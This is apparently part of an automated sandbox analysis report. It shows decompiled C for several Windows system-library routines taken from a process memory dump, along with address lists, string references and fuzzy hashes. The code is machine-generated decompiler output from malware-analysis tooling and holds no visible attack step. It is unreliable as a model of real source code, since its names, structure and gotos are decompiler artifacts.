0x01575439
0x0157545e
0x0157545e
0x00000000
0x0157545e
0x0157543b
0x0157543e
0x01575440
0x01575445
0x01575472
0x01575475
0x0157548d
0x01575493
0x015754a9
0x00000000
0x00000000
0x015754ab
0x015754b4
0x015754bc
0x015754c8
0x015754de
0x015754fb
0x015754e0
0x015754e6
0x015754eb
0x015754eb
0x015754de
0x00000000
0x015754bc
0x01575477
0x0157547a
0x01575480
0x01575483
0x01575486
0x0157548b
0x00000000
0x00000000
0x00000000
0x0157548b
0x00000000
0x00000000
0x00000000
0x00000000
0x01575447
0x01575447
0x01575447
0x01575447
0x0157544e
0x00000000
0x00000000
0x01575450
0x01575452
0x01575455
0x0157545a
0x00000000
0x00000000
0x00000000
0x0157545c
0x0157546a
0x0157546d
0x0157546f
0x00000000
0x0157546f
0x0151e70f

Strings

\Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 0151E68C
InstallLanguageFallback, xrefs: 0151E6DB
@, xrefs: 0151E6C0

Memory Dump Source

Source File: 00000003.00000002.298699245.00000000014F0000.00000040.00000001.sdmp, Offset: 014F0000, based on PE: true

Similarity

API ID:
String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
API String ID: 0-1757540487
Opcode ID: 8dd02755dec7c9ddb3105a023d7720fba5bd7b209caf086c7c93dfa61f26af55
Instruction ID: e2482a0c3ff7ffab3052837e2bfa59f34e63909430c054edf64df7e373bbe834
Opcode Fuzzy Hash: 8dd02755dec7c9ddb3105a023d7720fba5bd7b209caf086c7c93dfa61f26af55
Instruction Fuzzy Hash: 5C51D3726183469BE712DF28D851A6FB7E9FF88614F04092EF985DB240FB34D904C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 015DE539, Relevance: 2.8, Strings: 2, Instructions: 261
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E015DE539(unsigned int* __ecx, intOrPtr __edx, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v40;
				char _v44;
				intOrPtr _v48;
				signed int _v52;
				unsigned int _v56;
				char _v60;
				signed int _v64;
				char _v68;
				signed int _v72;
				void* __ebx;
				void* __edi;
				char _t87;
				signed int _t90;
				signed int _t94;
				signed int _t100;
				intOrPtr* _t113;
				signed int _t122;
				void* _t132;
				void* _t135;
				signed int _t139;
				signed int* _t141;
				signed int _t146;
				signed int _t147;
				void* _t153;
				signed int _t155;
				signed int _t159;
				char _t166;
				void* _t172;
				void* _t176;
				signed int _t177;
				intOrPtr* _t179;

				_t179 = __ecx;
				_v48 = __edx;
				_v68 = 0;
				_v72 = 0;
				_push(__ecx[1]);
				_push( *__ecx);
				_push(0);
				_t153 = 0x14;
				_t135 = _t153;
				_t132 = E015DBBBB(_t135, _t153);
				if(_t132 == 0) {
					_t166 = _v68;
					goto L43;
				} else {
					_t155 = 0;
					_v52 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v56 = __ecx[1];
					if( *__ecx >> 8 < 2) {
						_t155 = 1;
						_v52 = 1;
					}
					_t139 = _a4;
					_t87 = (_t155 << 0xc) + _t139;
					_v60 = _t87;
					if(_t87 < _t139) {
						L11:
						_t166 = _v68;
						L12:
						if(_t132 != 0) {
							E015DBCD2(_t132,  *_t179,  *((intOrPtr*)(_t179 + 4)));
						}
						L43:
						if(_v72 != 0) {
							_push( *((intOrPtr*)(_t179 + 4)));
							_push( *_t179);
							_push(0x8000);
							E015DAFDE( &_v72,  &_v60);
						}
						L46:
						return _t166;
					}
					_t90 =  *(_t179 + 0xc) & 0x40000000;
					asm("sbb edi, edi");
					_t172 = ( ~_t90 & 0x0000003c) + 4;
					if(_t90 != 0) {
						_push(0);
						_push(0x14);
						_push( &_v44);
						_push(3);
						_push(_t179);
						_push(0xffffffff);
						if(E01559730() < 0 || (_v40 & 0x00000060) == 0 || _v44 != _t179) {
							_push(_t139);
							E015DA80D(_t179, 1, _v40, 0);
							_t172 = 4;
						}
					}
					_t141 =  &_v72;
					if(E015DA854(_t141,  &_v60, 0, 0x2000, _t172, _t179,  *_t179,  *((intOrPtr*)(_t179 + 4))) >= 0) {
						_v64 = _a4;
						_t94 =  *(_t179 + 0xc) & 0x40000000;
						asm("sbb edi, edi");
						_t176 = ( ~_t94 & 0x0000003c) + 4;
						if(_t94 != 0) {
							_push(0);
							_push(0x14);
							_push( &_v24);
							_push(3);
							_push(_t179);
							_push(0xffffffff);
							if(E01559730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t179) {
								_push(_t141);
								E015DA80D(_t179, 1, _v20, 0);
								_t176 = 4;
							}
						}
						if(E015DA854( &_v72,  &_v64, 0, 0x1000, _t176, 0,  *_t179,  *((intOrPtr*)(_t179 + 4))) < 0) {
							goto L11;
						} else {
							_t177 = _v64;
							 *((intOrPtr*)(_t132 + 0xc)) = _v72;
							_t100 = _v52 + _v52;
							_t146 =  *(_t132 + 0x10) & 0x00000ffd | _t177 & 0xfffff000 | _t100;
							 *(_t132 + 0x10) = _t146;
							asm("bsf eax, [esp+0x18]");
							_v52 = _t100;
							 *(_t132 + 0x10) = (_t100 << 0x00000002 ^ _t146) & 0x000000fc ^ _t146;
							 *((short*)(_t132 + 0xc)) = _t177 - _v48;
							_t47 =  &_a8;
							 *_t47 = _a8 & 0x00000001;
							if( *_t47 == 0) {
								E01532280(_t179 + 0x30, _t179 + 0x30);
							}
							_t147 =  *(_t179 + 0x34);
							_t159 =  *(_t179 + 0x38) & 1;
							_v68 = 0;
							if(_t147 == 0) {
								L35:
								E0152B090(_t179 + 0x34, _t147, _v68, _t132);
								if(_a8 == 0) {
									E0152FFB0(_t132, _t177, _t179 + 0x30);
								}
								asm("lock xadd [eax], ecx");
								asm("lock xadd [eax], edx");
								_t132 = 0;
								_v72 = _v72 & 0;
								_v68 = _v72;
								if(E01537D50() == 0) {
									_t113 = 0x7ffe0388;
								} else {
									_t177 = _v64;
									_t113 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
								}
								if( *_t113 == _t132) {
									_t166 = _v68;
									goto L46;
								} else {
									_t166 = _v68;
									E015CFEC0(_t132, _t179, _t166, _t177 + 0x1000);
									goto L12;
								}
							} else {
								L23:
								while(1) {
									if(_v72 < ( *(_t147 + 0xc) & 0xffff0000)) {
										_t122 =  *_t147;
										if(_t159 == 0) {
											L32:
											if(_t122 == 0) {
												L34:
												_v68 = 0;
												goto L35;
											}
											L33:
											_t147 = _t122;
											continue;
										}
										if(_t122 == 0) {
											goto L34;
										}
										_t122 = _t122 ^ _t147;
										goto L32;
									}
									_t122 =  *(_t147 + 4);
									if(_t159 == 0) {
										L27:
										if(_t122 != 0) {
											goto L33;
										}
										L28:
										_v68 = 1;
										goto L35;
									}
									if(_t122 == 0) {
										goto L28;
									}
									_t122 = _t122 ^ _t147;
									goto L27;
								}
							}
						}
					}
					_v72 = _v72 & 0x00000000;
					goto L11;
				}
			}

0x015de547
0x015de549
0x015de54f
0x015de553
0x015de557
0x015de55a
0x015de55c
0x015de55f
0x015de561
0x015de567
0x015de56b
0x015de7e2
0x00000000
0x015de571
0x015de575
0x015de577
0x015de57b
0x015de57c
0x015de57d
0x015de57e
0x015de57f
0x015de588
0x015de58f
0x015de591
0x015de592
0x015de592
0x015de596
0x015de59e
0x015de5a0
0x015de5a6
0x015de61d
0x015de61d
0x015de621
0x015de623
0x015de630
0x015de630
0x015de7e6
0x015de7eb
0x015de7ed
0x015de7f4
0x015de7fa
0x015de7ff
0x015de7ff
0x015de80a
0x015de812
0x015de812
0x015de5ab
0x015de5b4
0x015de5b9
0x015de5be
0x015de5c0
0x015de5c2
0x015de5c8
0x015de5c9
0x015de5cb
0x015de5cc
0x015de5d5
0x015de5e4
0x015de5f1
0x015de5f8
0x015de5f8
0x015de5d5
0x015de602
0x015de616
0x015de63d
0x015de644
0x015de64d
0x015de652
0x015de657
0x015de659
0x015de65b
0x015de661
0x015de662
0x015de664
0x015de665
0x015de66e
0x015de67d
0x015de68a
0x015de691
0x015de691
0x015de66e
0x015de6b0
0x00000000
0x015de6b6
0x015de6bd
0x015de6c7
0x015de6d7
0x015de6d9
0x015de6db
0x015de6de
0x015de6e3
0x015de6f3
0x015de6fc
0x015de700
0x015de700
0x015de704
0x015de70a
0x015de70a
0x015de713
0x015de716
0x015de719
0x015de720
0x015de761
0x015de76b
0x015de774
0x015de77a
0x015de77a
0x015de78a
0x015de791
0x015de799
0x015de79b
0x015de79f
0x015de7aa
0x015de7c0
0x015de7ac
0x015de7b2
0x015de7b9
0x015de7b9
0x015de7c7
0x015de806
0x00000000
0x015de7c9
0x015de7d1
0x015de7d8
0x00000000
0x015de7d8
0x00000000
0x00000000
0x015de722
0x015de72e
0x015de748
0x015de74c
0x015de754
0x015de756
0x015de75c
0x015de75c
0x00000000
0x015de75c
0x015de758
0x015de758
0x00000000
0x015de758
0x015de750
0x00000000
0x00000000
0x015de752
0x00000000
0x015de752
0x015de730
0x015de735
0x015de73d
0x015de73f
0x00000000
0x00000000
0x015de741
0x015de741
0x00000000
0x015de741
0x015de739
0x00000000
0x00000000
0x015de73b
0x00000000
0x015de73b
0x015de722
0x015de720
0x015de6b0
0x015de618
0x00000000
0x015de618

Strings

`, xrefs: 015DE5D7
`, xrefs: 015DE670

Memory Dump Source

Source File: 00000003.00000002.298699245.00000000014F0000.00000040.00000001.sdmp, Offset: 014F0000, based on PE: true

Similarity

API ID:
String ID: `$`
API String ID: 0-197956300
Opcode ID: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
Instruction ID: 2b7ee25a6498471aa6104eb9efc3b36293ad2678c5244621c60fea223ed8f878
Opcode Fuzzy Hash: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
Instruction Fuzzy Hash: 41914A316043429BE765CE29C842B1BBBE6FF84714F14892DFA99CF280E774E904CB52

Uniqueness

Uniqueness Score: -1.00%

Function 015951BE, Relevance: 2.7, Strings: 2, Instructions: 173
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E015951BE(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				signed short* _t63;
				signed int _t64;
				signed int _t65;
				signed int _t67;
				intOrPtr _t74;
				intOrPtr _t84;
				intOrPtr _t88;
				intOrPtr _t94;
				void* _t100;
				void* _t103;
				intOrPtr _t105;
				signed int _t106;
				short* _t108;
				signed int _t110;
				signed int _t113;
				signed int* _t115;
				signed short* _t117;
				void* _t118;
				void* _t119;

				_push(0x80);
				_push(0x15f05f0);
				E0156D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t118 - 0x80)) = __edx;
				_t115 =  *(_t118 + 0xc);
				 *(_t118 - 0x7c) = _t115;
				 *((char*)(_t118 - 0x65)) = 0;
				 *((intOrPtr*)(_t118 - 0x64)) = 0;
				_t113 = 0;
				 *((intOrPtr*)(_t118 - 0x6c)) = 0;
				 *((intOrPtr*)(_t118 - 4)) = 0;
				_t100 = __ecx;
				if(_t100 == 0) {
					 *(_t118 - 0x90) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
					E0152EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *((char*)(_t118 - 0x65)) = 1;
					_t63 =  *(_t118 - 0x90);
					_t101 = _t63[2];
					_t64 =  *_t63 & 0x0000ffff;
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					L20:
					_t65 = _t64 >> 1;
					L21:
					_t108 =  *((intOrPtr*)(_t118 - 0x80));
					if(_t108 == 0) {
						L27:
						 *_t115 = _t65 + 1;
						_t67 = 0xc0000023;
						L28:
						 *((intOrPtr*)(_t118 - 0x64)) = _t67;
						L29:
						 *((intOrPtr*)(_t118 - 4)) = 0xfffffffe;
						E015953CA(0);
						return E0156D130(0, _t113, _t115);
					}
					if(_t65 >=  *((intOrPtr*)(_t118 + 8))) {
						if(_t108 != 0 &&  *((intOrPtr*)(_t118 + 8)) >= 1) {
							 *_t108 = 0;
						}
						goto L27;
					}
					 *_t115 = _t65;
					_t115 = _t65 + _t65;
					E0155F3E0(_t108, _t101, _t115);
					 *((short*)(_t115 +  *((intOrPtr*)(_t118 - 0x80)))) = 0;
					_t67 = 0;
					goto L28;
				}
				_t103 = _t100 - 1;
				if(_t103 == 0) {
					_t117 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38;
					_t74 = E01533690(1, _t117, 0x14f1810, _t118 - 0x74);
					 *((intOrPtr*)(_t118 - 0x64)) = _t74;
					_t101 = _t117[2];
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					if(_t74 < 0) {
						_t64 =  *_t117 & 0x0000ffff;
						_t115 =  *(_t118 - 0x7c);
						goto L20;
					}
					_t65 = (( *(_t118 - 0x74) & 0x0000ffff) >> 1) + 1;
					_t115 =  *(_t118 - 0x7c);
					goto L21;
				}
				if(_t103 == 1) {
					_t105 = 4;
					 *((intOrPtr*)(_t118 - 0x78)) = _t105;
					 *((intOrPtr*)(_t118 - 0x70)) = 0;
					_push(_t118 - 0x70);
					_push(0);
					_push(0);
					_push(_t105);
					_push(_t118 - 0x78);
					_push(0x6b);
					 *((intOrPtr*)(_t118 - 0x64)) = E0155AA90();
					 *((intOrPtr*)(_t118 - 0x64)) = 0;
					_t113 = L01534620(_t105,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8,  *((intOrPtr*)(_t118 - 0x70)));
					 *((intOrPtr*)(_t118 - 0x6c)) = _t113;
					if(_t113 != 0) {
						_push(_t118 - 0x70);
						_push( *((intOrPtr*)(_t118 - 0x70)));
						_push(_t113);
						_push(4);
						_push(_t118 - 0x78);
						_push(0x6b);
						_t84 = E0155AA90();
						 *((intOrPtr*)(_t118 - 0x64)) = _t84;
						if(_t84 < 0) {
							goto L29;
						}
						_t110 = 0;
						_t106 = 0;
						while(1) {
							 *((intOrPtr*)(_t118 - 0x84)) = _t110;
							 *(_t118 - 0x88) = _t106;
							if(_t106 >= ( *(_t113 + 0xa) & 0x0000ffff)) {
								break;
							}
							_t110 = _t110 + ( *(_t106 * 0x2c + _t113 + 0x21) & 0x000000ff);
							_t106 = _t106 + 1;
						}
						_t88 = E0159500E(_t106, _t118 - 0x3c, 0x20, _t118 - 0x8c, 0, 0, L"%u", _t110);
						_t119 = _t119 + 0x1c;
						 *((intOrPtr*)(_t118 - 0x64)) = _t88;
						if(_t88 < 0) {
							goto L29;
						}
						_t101 = _t118 - 0x3c;
						_t65 =  *((intOrPtr*)(_t118 - 0x8c)) - _t118 - 0x3c >> 1;
						goto L21;
					}
					_t67 = 0xc0000017;
					goto L28;
				}
				_push(0);
				_push(0x20);
				_push(_t118 - 0x60);
				_push(0x5a);
				_t94 = E01559860();
				 *((intOrPtr*)(_t118 - 0x64)) = _t94;
				if(_t94 < 0) {
					goto L29;
				}
				if( *((intOrPtr*)(_t118 - 0x50)) == 1) {
					_t101 = L"Legacy";
					_push(6);
				} else {
					_t101 = L"UEFI";
					_push(4);
				}
				_pop(_t65);
				goto L21;
			}

0x015951be
0x015951c3
0x015951c8
0x015951cd
0x015951d0
0x015951d3
0x015951d8
0x015951db
0x015951de
0x015951e0
0x015951e3
0x015951e6
0x015951e8
0x01595342
0x01595351
0x01595356
0x0159535a
0x01595360
0x01595363
0x01595366
0x01595369
0x01595369
0x0159536b
0x0159536b
0x01595370
0x015953a3
0x015953a4
0x015953a6
0x015953ab
0x015953ab
0x015953ae
0x015953ae
0x015953b5
0x015953bf
0x015953bf
0x01595375
0x01595396
0x015953a0
0x015953a0
0x00000000
0x01595396
0x01595377
0x01595379
0x0159537f
0x0159538c
0x01595390
0x00000000
0x01595390
0x015951ee
0x015951f1
0x01595301
0x01595310
0x01595315
0x01595318
0x0159531b
0x01595320
0x0159532e
0x01595331
0x00000000
0x01595331
0x01595328
0x01595329
0x00000000
0x01595329
0x015951fa
0x01595235
0x01595236
0x01595239
0x0159523f
0x01595240
0x01595241
0x01595242
0x01595246
0x01595247
0x0159524e
0x01595251
0x01595267
0x01595269
0x0159526e
0x0159527d
0x0159527e
0x01595281
0x01595282
0x01595287
0x01595288
0x0159528a
0x0159528f
0x01595294
0x00000000
0x00000000
0x0159529a
0x0159529c
0x0159529e
0x0159529e
0x015952a4
0x015952b0
0x00000000
0x00000000
0x015952ba
0x015952bc
0x015952bc
0x015952d4
0x015952d9
0x015952dc
0x015952e1
0x00000000
0x00000000
0x015952e7
0x015952f4
0x00000000
0x015952f4
0x01595270
0x00000000
0x01595270
0x015951fc
0x015951fd
0x01595202
0x01595203
0x01595205
0x0159520a
0x0159520f
0x00000000
0x00000000
0x0159521b
0x01595226
0x0159522b
0x0159521d
0x0159521d
0x01595222
0x01595222
0x0159522d
0x00000000

Strings

Legacy, xrefs: 01595226
UEFI, xrefs: 0159521D

Memory Dump Source

Source File: 00000003.00000002.298699245.00000000014F0000.00000040.00000001.sdmp, Offset: 014F0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID: Legacy$UEFI
API String ID: 2994545307-634100481
Opcode ID: 428372dd71ccd4f7d0cc068df87681738e9e259620f55e6c5cc4d2f7c54fc9b5
Instruction ID: 50218e08616eb24bb32aaf4ff09d7d4233ec6b52df07eff5ec786e2d21092f51
Opcode Fuzzy Hash: 428372dd71ccd4f7d0cc068df87681738e9e259620f55e6c5cc4d2f7c54fc9b5
Instruction Fuzzy Hash: F3518B71A1060A9FDF26DFA8C890AADBBF8FF48700F14446EE649EF251E7709910CB51

Uniqueness

Uniqueness Score: -1.00%

Function 0153B944, Relevance: 1.7, APIs: 1, Instructions: 166
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E0153B944(signed int* __ecx, char __edx) {
				signed int _v8;
				signed int _v16;
				signed int _v20;
				char _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				intOrPtr _v44;
				signed int* _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				char _v77;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t65;
				intOrPtr _t67;
				intOrPtr _t68;
				char* _t73;
				intOrPtr _t77;
				intOrPtr _t78;
				signed int _t82;
				intOrPtr _t83;
				void* _t87;
				char _t88;
				intOrPtr* _t89;
				intOrPtr _t91;
				void* _t97;
				intOrPtr _t100;
				void* _t102;
				void* _t107;
				signed int _t108;
				intOrPtr* _t112;
				void* _t113;
				intOrPtr* _t114;
				intOrPtr _t115;
				intOrPtr _t116;
				intOrPtr _t117;
				signed int _t118;
				void* _t130;

				_t120 = (_t118 & 0xfffffff8) - 0x4c;
				_v8 =  *0x160d360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
				_t112 = __ecx;
				_v77 = __edx;
				_v48 = __ecx;
				_v28 = 0;
				_t5 = _t112 + 0xc; // 0x575651ff
				_t105 =  *_t5;
				_v20 = 0;
				_v16 = 0;
				if(_t105 == 0) {
					_t50 = _t112 + 4; // 0x5de58b5b
					_t60 =  *__ecx |  *_t50;
					if(( *__ecx |  *_t50) != 0) {
						 *__ecx = 0;
						__ecx[1] = 0;
						if(E01537D50() != 0) {
							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t65 = 0x7ffe0386;
						}
						if( *_t65 != 0) {
							E015E8CD6(_t112);
						}
						_push(0);
						_t52 = _t112 + 0x10; // 0x778df98b
						_push( *_t52);
						_t60 = E01559E20();
					}
					L20:
					_pop(_t107);
					_pop(_t113);
					_pop(_t87);
					return E0155B640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
				}
				_t8 = _t112 + 8; // 0x8b000cc2
				_t67 =  *_t8;
				_t88 =  *((intOrPtr*)(_t67 + 0x10));
				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
				_t108 =  *(_t67 + 0x14);
				_t68 =  *((intOrPtr*)(_t105 + 0x14));
				_t105 = 0x2710;
				asm("sbb eax, edi");
				_v44 = _t88;
				_v52 = _t108;
				_t60 = E0155CE00(_t97, _t68, 0x2710, 0);
				_v56 = _t60;
				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
					L3:
					 *(_t112 + 0x44) = _t60;
					_t105 = _t60 * 0x2710 >> 0x20;
					 *_t112 = _t88;
					 *(_t112 + 4) = _t108;
					_v20 = _t60 * 0x2710;
					_v16 = _t60 * 0x2710 >> 0x20;
					if(_v77 != 0) {
						L16:
						_v36 = _t88;
						_v32 = _t108;
						if(E01537D50() != 0) {
							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t73 = 0x7ffe0386;
						}
						if( *_t73 != 0) {
							_t105 = _v40;
							E015E8F6A(_t112, _v40, _t88, _t108);
						}
						_push( &_v28);
						_push(0);
						_push( &_v36);
						_t48 = _t112 + 0x10; // 0x778df98b
						_push( *_t48);
						_t60 = E0155AF60();
						goto L20;
					} else {
						_t89 = 0x7ffe03b0;
						do {
							_t114 = 0x7ffe0010;
							do {
								_t77 =  *0x1608628; // 0x0
								_v68 = _t77;
								_t78 =  *0x160862c; // 0x0
								_v64 = _t78;
								_v72 =  *_t89;
								_v76 =  *((intOrPtr*)(_t89 + 4));
								while(1) {
									_t105 =  *0x7ffe000c;
									_t100 =  *0x7ffe0008;
									if(_t105 ==  *_t114) {
										goto L8;
									}
									asm("pause");
								}
								L8:
								_t89 = 0x7ffe03b0;
								_t115 =  *0x7ffe03b0;
								_t82 =  *0x7FFE03B4;
								_v60 = _t115;
								_t114 = 0x7ffe0010;
								_v56 = _t82;
							} while (_v72 != _t115 || _v76 != _t82);
							_t83 =  *0x1608628; // 0x0
							_t116 =  *0x160862c; // 0x0
							_v76 = _t116;
							_t117 = _v68;
						} while (_t117 != _t83 || _v64 != _v76);
						asm("sbb edx, [esp+0x24]");
						_t102 = _t100 - _v60 - _t117;
						_t112 = _v48;
						_t91 = _v44;
						asm("sbb edx, eax");
						_t130 = _t105 - _v52;
						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
							_t88 = _t102 - _t91;
							asm("sbb edx, edi");
							_t108 = _t105;
						} else {
							_t88 = 0;
							_t108 = 0;
						}
						goto L16;
					}
				} else {
					if( *(_t112 + 0x44) == _t60) {
						goto L20;
					}
					goto L3;
				}
			}

0x0153b94c
0x0153b956
0x0153b95c
0x0153b95e
0x0153b964
0x0153b969
0x0153b96d
0x0153b96d
0x0153b970
0x0153b974
0x0153b97a
0x0153badf
0x0153badf
0x0153bae2
0x0153bae4
0x0153bae6
0x0153baf0
0x01582cb8
0x0153baf6
0x0153baf6
0x0153baf6
0x0153bafd
0x0153bb1f
0x0153bb1f
0x0153baff
0x0153bb00
0x0153bb00
0x0153bb03
0x0153bb03
0x0153bacb
0x0153bacf
0x0153bad0
0x0153bad1
0x0153badc
0x0153badc
0x0153b980
0x0153b980
0x0153b988
0x0153b98b
0x0153b98d
0x0153b990
0x0153b993
0x0153b999
0x0153b99b
0x0153b9a1
0x0153b9a5
0x0153b9aa
0x0153b9b0
0x0153b9bb
0x0153b9c0
0x0153b9c3
0x0153b9ca
0x0153b9cc
0x0153b9cf
0x0153b9d3
0x0153b9d7
0x0153ba94
0x0153ba94
0x0153ba98
0x0153baa3
0x01582ccb
0x0153baa9
0x0153baa9
0x0153baa9
0x0153bab1
0x01582cd5
0x01582cdd
0x01582cdd
0x0153babb
0x0153babc
0x0153bac2
0x0153bac3
0x0153bac3
0x0153bac6
0x00000000
0x0153b9dd
0x0153b9dd
0x0153b9e7
0x0153b9e7
0x0153b9ec
0x0153b9ec
0x0153b9f1
0x0153b9f5
0x0153b9fa
0x0153ba00
0x0153ba0c
0x0153ba10
0x0153ba10
0x0153ba12
0x0153ba18
0x00000000
0x00000000
0x0153bb26
0x0153bb26
0x0153ba1e
0x0153ba1e
0x0153ba23
0x0153ba25
0x0153ba2c
0x0153ba30
0x0153ba35
0x0153ba35
0x0153ba41
0x0153ba46
0x0153ba4c
0x0153ba50
0x0153ba54
0x0153ba6a
0x0153ba6e
0x0153ba70
0x0153ba74
0x0153ba78
0x0153ba7a
0x0153ba7c
0x0153ba8e
0x0153ba90
0x0153ba92
0x0153bb14
0x0153bb14
0x0153bb16
0x0153bb16
0x00000000
0x0153ba7c
0x0153bb0a
0x0153bb0d
0x00000000
0x00000000
0x00000000
0x0153bb0f

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0153B9A5

Memory Dump Source

Source File: 00000003.00000002.298699245.00000000014F0000.00000040.00000001.sdmp, Offset: 014F0000, based on PE: true

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID:
API String ID: 885266447-0
Opcode ID: f024a256f538b8230e15689f1aaa3bef87744dbed3916bf5f8660959be0ef782
Instruction ID: fd578dfea049a9358258444fec60da0a4efc65b42768b23c704ec75d5e501fbb
Opcode Fuzzy Hash: f024a256f538b8230e15689f1aaa3bef87744dbed3916bf5f8660959be0ef782
Instruction Fuzzy Hash: 47516871A08701CFC725DF28C49092BBBF9FBC8610F14896EE9959B345DB71E844CB92

Uniqueness

Uniqueness Score: -1.00%

Function 0151B171, Relevance: 1.7, APIs: 1, Instructions: 166
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E0151B171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
				signed int _t65;
				signed short _t69;
				intOrPtr _t70;
				signed short _t85;
				void* _t86;
				signed short _t89;
				signed short _t91;
				intOrPtr _t92;
				intOrPtr _t97;
				intOrPtr* _t98;
				signed short _t99;
				signed short _t101;
				void* _t102;
				char* _t103;
				signed short _t104;
				intOrPtr* _t110;
				void* _t111;
				void* _t114;
				intOrPtr* _t115;

				_t109 = __esi;
				_t108 = __edi;
				_t106 = __edx;
				_t95 = __ebx;
				_push(0x90);
				_push(0x15ef7a8);
				E0156D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
				if(__edx == 0xffffffff) {
					L6:
					_t97 =  *((intOrPtr*)(_t114 - 0x78));
					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) != 0) {
						L3:
						L4:
						return E0156D130(_t95, _t108, _t109);
					}
					 *(_t97 + 0xfca) = _t65 | 0x00000002;
					_t108 = 0;
					_t109 = 0;
					_t95 = 0;
					__eflags = 0;
					while(1) {
						__eflags = _t95 - 0x200;
						if(_t95 >= 0x200) {
							break;
						}
						E0155D000(0x80);
						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
						_t108 = _t115;
						_t95 = _t95 - 0xffffff80;
						_t17 = _t114 - 4;
						 *_t17 =  *(_t114 - 4) & 0x00000000;
						__eflags =  *_t17;
						_t106 =  *((intOrPtr*)(_t114 - 0x84));
						_t110 =  *((intOrPtr*)(_t114 - 0x84));
						_t102 = _t110 + 1;
						do {
							_t85 =  *_t110;
							_t110 = _t110 + 1;
							__eflags = _t85;
						} while (_t85 != 0);
						_t111 = _t110 - _t102;
						_t21 = _t95 - 1; // -129
						_t86 = _t21;
						__eflags = _t111 - _t86;
						if(_t111 > _t86) {
							_t111 = _t86;
						}
						E0155F3E0(_t108, _t106, _t111);
						_t115 = _t115 + 0xc;
						_t103 = _t111 + _t108;
						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
						_t89 = _t95 - _t111;
						__eflags = _t89;
						_push(0);
						if(_t89 == 0) {
							L15:
							_t109 = 0xc000000d;
							goto L16;
						} else {
							__eflags = _t89 - 0x7fffffff;
							if(_t89 <= 0x7fffffff) {
								L16:
								 *(_t114 - 0x94) = _t109;
								__eflags = _t109;
								if(_t109 < 0) {
									__eflags = _t89;
									if(_t89 != 0) {
										 *_t103 = 0;
									}
									L26:
									 *(_t114 - 0xa0) = _t109;
									 *(_t114 - 4) = 0xfffffffe;
									__eflags = _t109;
									if(_t109 >= 0) {
										L31:
										_t98 = _t108;
										_t39 = _t98 + 1; // 0x1
										_t106 = _t39;
										do {
											_t69 =  *_t98;
											_t98 = _t98 + 1;
											__eflags = _t69;
										} while (_t69 != 0);
										_t99 = _t98 - _t106;
										__eflags = _t99;
										L34:
										_t70 =  *[fs:0x30];
										__eflags =  *((char*)(_t70 + 2));
										if( *((char*)(_t70 + 2)) != 0) {
											L40:
											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x64)) = 2;
											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
											 *(_t114 - 4) = 1;
											_push(_t114 - 0x74);
											L0156DEF0(_t99, _t106);
											 *(_t114 - 4) = 0xfffffffe;
											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
											goto L3;
										}
										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
										if(( *0x7ffe02d4 & 0x00000003) != 3) {
											goto L40;
										}
										_push( *((intOrPtr*)(_t114 + 8)));
